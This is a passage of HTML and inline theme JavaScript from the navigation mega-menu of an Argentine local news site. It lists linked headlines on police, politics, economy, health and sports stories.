block_td_uid_3_5b63716087c31.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"306","show_child_cat":"5"}';
block_td_uid_3_5b63716087c31.td_cur_cat = "306";
block_td_uid_3_5b63716087c31.td_column_number = "1";
block_td_uid_3_5b63716087c31.block_type = "td_mega_menu";
block_td_uid_3_5b63716087c31.post_count = "5";
block_td_uid_3_5b63716087c31.found_posts = "183";
block_td_uid_3_5b63716087c31.max_num_pages = "37";
block_td_uid_3_5b63716087c31.header_color = "";
td_blocks.push(block_td_uid_3_5b63716087c31);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_3_5b63716087c31 class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/el-gap-se-hizo-cargo-del-asalto-y-robo-al-joven-chino/" rel="bookmark" title="El GAP se hizo cargo del asalto y robo al joven chino"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i1.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Sin-título-104.jpg?resize=198%2C143&#038;ssl=1" alt="" title="El GAP se hizo cargo del asalto y robo al joven chino"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/el-gap-se-hizo-cargo-del-asalto-y-robo-al-joven-chino/" rel="bookmark" title="El GAP se hizo cargo del asalto y robo al joven chino">El GAP se hizo cargo del asalto y robo al joven chino</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/demoran-a-joven-por-robo-en-escuela/" rel="bookmark" title="Demoran a joven por robo en escuela"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i2.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Siniestro-fatal-en-Piquirenda.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Demoran a joven por robo en escuela"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/demoran-a-joven-por-robo-en-escuela/" rel="bookmark" title="Demoran a joven por robo en escuela">Demoran a joven por robo en escuela</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/el-juicio-por-el-caso-daniel-solano-llega-a-su-fin/" rel="bookmark" title="El juicio por el caso Daniel Solano llega a su fin"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i1.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/El-juicio-por-el-caso-Daniel-Solano-llega-a-su-fin-1.jpg?resize=198%2C143&#038;ssl=1" alt="" title="El juicio por el caso Daniel Solano llega a su fin"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/el-juicio-por-el-caso-daniel-solano-llega-a-su-fin/" rel="bookmark" title="El juicio por el caso Daniel Solano llega a su fin">El juicio por el caso Daniel Solano llega a su fin</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/volco-un-camion-que-transportaba-carbon/" rel="bookmark" title="Volcó un camión que transportaba carbón"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i1.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Volcó-un-camión-que-transportaba-carbón.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Volcó un camión que transportaba carbón"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/volco-un-camion-que-transportaba-carbon/" rel="bookmark" title="Volcó un camión que transportaba carbón">Volcó un camión que transportaba carbón</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/siniestros-con-victimas-fatales-el-fin-de-semana/" rel="bookmark" title="Siniestros con víctimas fatales el fin de semana"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Siniestros-con-víctimas-fatales-el-fin-de-semana.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Siniestros con víctimas fatales el fin de semana"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/siniestros-con-victimas-fatales-el-fin-de-semana/" rel="bookmark" title="Siniestros con víctimas fatales el fin de semana">Siniestros con víctimas fatales el fin de semana</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_3_5b63716087c31" data-td_block_id="td_uid_3_5b63716087c31"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_3_5b63716087c31" data-td_block_id="td_uid_3_5b63716087c31"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-not-mega td-mega-menu menu-item-1873"><a href="https://www.videotarnoticias.com/category/politica/">Politica</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_5_5b6371608d7e3 = new td_block();
block_td_uid_5_5b6371608d7e3.id = "td_uid_5_5b6371608d7e3";
block_td_uid_5_5b6371608d7e3.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"307","show_child_cat":"5"}';
block_td_uid_5_5b6371608d7e3.td_cur_cat = "307";
block_td_uid_5_5b6371608d7e3.td_column_number = "1";
block_td_uid_5_5b6371608d7e3.block_type = "td_mega_menu";
block_td_uid_5_5b6371608d7e3.post_count = "5";
block_td_uid_5_5b6371608d7e3.found_posts = "187";
block_td_uid_5_5b6371608d7e3.max_num_pages = "38";
block_td_uid_5_5b6371608d7e3.header_color = "";
td_blocks.push(block_td_uid_5_5b6371608d7e3);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_5_5b6371608d7e3 class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/la-sospecha-de-las-coimas-en-la-obra-publica/" rel="bookmark" title="La sospecha de las coimas en la obra publica"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i2.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Sin-título-93.jpg?resize=198%2C143&#038;ssl=1" alt="" title="La sospecha de las coimas en la obra publica"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/la-sospecha-de-las-coimas-en-la-obra-publica/" rel="bookmark" title="La sospecha de las coimas en la obra publica">La sospecha de las coimas en la obra publica</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/el-que-tenga-pruebas-que-valla-a-la-justicia/" rel="bookmark" title="El que tenga pruebas que valla a la justicia"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Sin-título-95.jpg?resize=198%2C143&#038;ssl=1" alt="" title="El que tenga pruebas que valla a la justicia"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/el-que-tenga-pruebas-que-valla-a-la-justicia/" rel="bookmark" title="El que tenga pruebas que valla a la justicia">El que tenga pruebas que valla a la justicia</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/piden-informes-sobre-otorgamiento-de-pensiones/" rel="bookmark" title="Piden informes sobre otorgamiento de pensiones"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Sin-título-90.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Piden informes sobre otorgamiento de pensiones"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/piden-informes-sobre-otorgamiento-de-pensiones/" rel="bookmark" title="Piden informes sobre otorgamiento de pensiones">Piden informes sobre otorgamiento de pensiones</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/parodi-se-reune-con-cooperativistas/" rel="bookmark" title="Parodi se reúne con Cooperativistas"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i1.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Sin-título-89.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Parodi se reúne con Cooperativistas"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/parodi-se-reune-con-cooperativistas/" rel="bookmark" title="Parodi se reúne con Cooperativistas">Parodi se reúne con Cooperativistas</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/las-sospechas-de-coimas-llegaron-al-concejo/" rel="bookmark" title="Las sospechas de coimas llegaron al Concejo"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i1.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Sin-título-86.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Las sospechas de coimas llegaron al Concejo"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/las-sospechas-de-coimas-llegaron-al-concejo/" rel="bookmark" title="Las sospechas de coimas llegaron al Concejo">Las sospechas de coimas llegaron al Concejo</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_5_5b6371608d7e3" data-td_block_id="td_uid_5_5b6371608d7e3"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_5_5b6371608d7e3" data-td_block_id="td_uid_5_5b6371608d7e3"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-not-mega td-mega-menu menu-item-1949"><a href="https://www.videotarnoticias.com/category/economia/">Economía</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_7_5b637160953b4 = new td_block();
block_td_uid_7_5b637160953b4.id = "td_uid_7_5b637160953b4";
block_td_uid_7_5b637160953b4.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"348","show_child_cat":"5"}';
block_td_uid_7_5b637160953b4.td_cur_cat = "348";
block_td_uid_7_5b637160953b4.td_column_number = "1";
block_td_uid_7_5b637160953b4.block_type = "td_mega_menu";
block_td_uid_7_5b637160953b4.post_count = "5";
block_td_uid_7_5b637160953b4.found_posts = "7";
block_td_uid_7_5b637160953b4.max_num_pages = "2";
block_td_uid_7_5b637160953b4.header_color = "";
td_blocks.push(block_td_uid_7_5b637160953b4);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_7_5b637160953b4 class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/acuerdo-por-tarifas-se-pagara-en-montos-mas-parejos-durante-todo-el-ano-y-habra-cuotas/" rel="bookmark" title="Acuerdo por tarifas: se pagará en montos más parejos durante todo el año y habrá cuotas"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/04/Acuerdo-por-tarifas.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Acuerdo por tarifas: se pagará en montos más parejos durante todo el año y habrá cuotas"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/acuerdo-por-tarifas-se-pagara-en-montos-mas-parejos-durante-todo-el-ano-y-habra-cuotas/" rel="bookmark" title="Acuerdo por tarifas: se pagará en montos más parejos durante todo el año y habrá cuotas">Acuerdo por tarifas: se pagará en montos más parejos durante todo el año y habrá cuotas</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/paran-los-trabajadores-de-la-television/" rel="bookmark" title="Paran los trabajadores de la televisión"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2016/08/paro1.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Paran los trabajadores de la televisión"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/paran-los-trabajadores-de-la-television/" rel="bookmark" title="Paran los trabajadores de la televisión">Paran los trabajadores de la televisión</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/problemas-con-las-garrafas-solidarias/" rel="bookmark" title="Problemas con las garrafas solidarias"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2015/04/garrafasolidaria.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Problemas con las garrafas solidarias"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/problemas-con-las-garrafas-solidarias/" rel="bookmark" title="Problemas con las garrafas solidarias">Problemas con las garrafas solidarias</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/terrorismo-estadounidense/" rel="bookmark" title="Terrorismo estadounidense: Por Noam Chomsky"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i1.wp.com/www.videotarnoticias.com/wp-content/uploads/2014/12/estadosunidos.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Terrorismo estadounidense: Por Noam Chomsky"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/terrorismo-estadounidense/" rel="bookmark" title="Terrorismo estadounidense: Por Noam Chomsky">Terrorismo estadounidense: Por Noam Chomsky</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/negociaron-el-presupuesto/" rel="bookmark" title="Negociaron el presupuesto"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i2.wp.com/www.videotarnoticias.com/wp-content/uploads/2014/12/ferminhoyos.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Negociaron el presupuesto"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/negociaron-el-presupuesto/" rel="bookmark" title="Negociaron el presupuesto">Negociaron el presupuesto</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_7_5b637160953b4" data-td_block_id="td_uid_7_5b637160953b4"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_7_5b637160953b4" data-td_block_id="td_uid_7_5b637160953b4"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-not-mega td-mega-menu menu-item-1874"><a href="https://www.videotarnoticias.com/category/salud/">Salud</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_9_5b6371609bfd9 = new td_block();
block_td_uid_9_5b6371609bfd9.id = "td_uid_9_5b6371609bfd9";
block_td_uid_9_5b6371609bfd9.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"308","show_child_cat":"5"}';
block_td_uid_9_5b6371609bfd9.td_cur_cat = "308";
block_td_uid_9_5b6371609bfd9.td_column_number = "1";
block_td_uid_9_5b6371609bfd9.block_type = "td_mega_menu";
block_td_uid_9_5b6371609bfd9.post_count = "5";
block_td_uid_9_5b6371609bfd9.found_posts = "120";
block_td_uid_9_5b6371609bfd9.max_num_pages = "24";
block_td_uid_9_5b6371609bfd9.header_color = "";
td_blocks.push(block_td_uid_9_5b6371609bfd9);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_9_5b6371609bfd9 class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/murio-en-el-hospital-el-joven-golpeado-por-una-patota/" rel="bookmark" title="Murió en el hospital el joven golpeado por una patota"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i2.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Sin-título-106.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Murió en el hospital el joven golpeado por una patota"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/murio-en-el-hospital-el-joven-golpeado-por-una-patota/" rel="bookmark" title="Murió en el hospital el joven golpeado por una patota">Murió en el hospital el joven golpeado por una patota</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/el-descargo-de-la-gerencia/" rel="bookmark" title="El descargo de la gerencia"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i2.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Sin-título-107.jpg?resize=198%2C143&#038;ssl=1" alt="" title="El descargo de la gerencia"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/el-descargo-de-la-gerencia/" rel="bookmark" title="El descargo de la gerencia">El descargo de la gerencia</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/el-hospital-de-la-madres-de-plaza-de-mayo-fue-inaugurado/" rel="bookmark" title="El hospital de la Madres de Plaza de Mayo fue inaugurado"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Sin-título-108.jpg?resize=198%2C143&#038;ssl=1" alt="" title="El hospital de la Madres de Plaza de Mayo fue inaugurado"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/el-hospital-de-la-madres-de-plaza-de-mayo-fue-inaugurado/" rel="bookmark" title="El hospital de la Madres de Plaza de Mayo fue inaugurado">El hospital de la Madres de Plaza de Mayo fue inaugurado</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/el-dr-guido-bergman-brindara-charlas-de-prevencion/" rel="bookmark" title="El Dr. Guido Bergman brindara charlas de prevención"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i1.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Sin-título-101.jpg?resize=198%2C143&#038;ssl=1" alt="" title="El Dr. Guido Bergman brindara charlas de prevención"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/el-dr-guido-bergman-brindara-charlas-de-prevencion/" rel="bookmark" title="El Dr. Guido Bergman brindara charlas de prevención">El Dr. Guido Bergman brindara charlas de prevención</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/sin-fecha-para-el-juicio-de-la-nina-wichi-abusada/" rel="bookmark" title="Sin fecha para el juicio de la niña Wichi abusada"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Sin-título-85.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Sin fecha para el juicio de la niña Wichi abusada"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/sin-fecha-para-el-juicio-de-la-nina-wichi-abusada/" rel="bookmark" title="Sin fecha para el juicio de la niña Wichi abusada">Sin fecha para el juicio de la niña Wichi abusada</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_9_5b6371609bfd9" data-td_block_id="td_uid_9_5b6371609bfd9"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_9_5b6371609bfd9" data-td_block_id="td_uid_9_5b6371609bfd9"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-not-mega td-mega-menu menu-item-1875"><a href="https://www.videotarnoticias.com/category/deportes/">Deportes</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_11_5b637160a19d5 = new td_block();
block_td_uid_11_5b637160a19d5.id = "td_uid_11_5b637160a19d5";
block_td_uid_11_5b637160a19d5.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"309","show_child_cat":"5"}';
block_td_uid_11_5b637160a19d5.td_cur_cat = "309";
block_td_uid_11_5b637160a19d5.td_column_number = "1";
block_td_uid_11_5b637160a19d5.block_type = "td_mega_menu";
block_td_uid_11_5b637160a19d5.post_count = "5";
block_td_uid_11_5b637160a19d5.found_posts = "10";
block_td_uid_11_5b637160a19d5.max_num_pages = "2";
block_td_uid_11_5b637160a19d5.header_color = "";
td_blocks.push(block_td_uid_11_5b637160a19d5);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_11_5b637160a19d5 class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/kevin-benavides-ganador-del-suns-race-2015/" rel="bookmark" title="Kevin Benavides ganador del Sun´s Race 2015"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i1.wp.com/www.videotarnoticias.com/wp-content/uploads/2015/07/sunsrace2015.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Kevin Benavides ganador del Sun´s Race 2015"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/kevin-benavides-ganador-del-suns-race-2015/" rel="bookmark" title="Kevin Benavides ganador del Sun´s Race 2015">Kevin Benavides ganador del Sun´s Race 2015</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/ultimos-preparativos-para-el-suns-race-2015/" rel="bookmark" title="Ultimos preparativos para el Sun´s Race 2015"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i1.wp.com/www.videotarnoticias.com/wp-content/uploads/2015/07/sunsrace.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Ultimos preparativos para el Sun´s Race 2015"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/ultimos-preparativos-para-el-suns-race-2015/" rel="bookmark" title="Ultimos preparativos para el Sun´s Race 2015">Ultimos preparativos para el Sun´s Race 2015</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/lanzamiento-de-la-19o-edicion-del-suns-race-2015/" rel="bookmark" title="Lanzamiento de la 19º edición del Sun´s Race 2015"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i2.wp.com/www.videotarnoticias.com/wp-content/uploads/2015/06/sunsrace.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Lanzamiento de la 19º edición del Sun´s Race 2015"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/lanzamiento-de-la-19o-edicion-del-suns-race-2015/" rel="bookmark" title="Lanzamiento de la 19º edición del Sun´s Race 2015">Lanzamiento de la 19º edición del Sun´s Race 2015</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/ricky-santillan-perdio-por-ko-en-japon/" rel="bookmark" title="“Ricky” Santillán perdió por KO en Japón"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i2.wp.com/www.videotarnoticias.com/wp-content/uploads/2015/04/rickysantillan.jpg?resize=198%2C143&#038;ssl=1" alt="" title="“Ricky” Santillán perdió por KO en Japón"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/ricky-santillan-perdio-por-ko-en-japon/" rel="bookmark" title="“Ricky” Santillán perdió por KO en Japón">“Ricky” Santillán perdió por KO en Japón</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/central-se-juega-la-clasificacion-ante-lastenia/" rel="bookmark" title="Central se juega la clasificación ante Lastenia"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2014/11/central.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Central se juega la clasificación ante Lastenia"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/central-se-juega-la-clasificacion-ante-lastenia/" rel="bookmark" title="Central se juega la clasificación ante Lastenia">Central se juega la clasificación ante Lastenia</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_11_5b637160a19d5" data-td_block_id="td_uid_11_5b637160a19d5"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_11_5b637160a19d5" data-td_block_id="td_uid_11_5b637160a19d5"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-not-mega td-mega-menu menu-item-1876"><a href="https://www.videotarnoticias.com/category/el-margen-2015/">El Margen</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_13_5b637160aa1f2 = new td_block();
block_td_uid_13_5b637160aa1f2.id = "td_uid_13_5b637160aa1f2";
block_td_uid_13_5b637160aa1f2.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"310","show_child_cat":"5"}';
block_td_uid_13_5b637160aa1f2.td_cur_cat = "310";
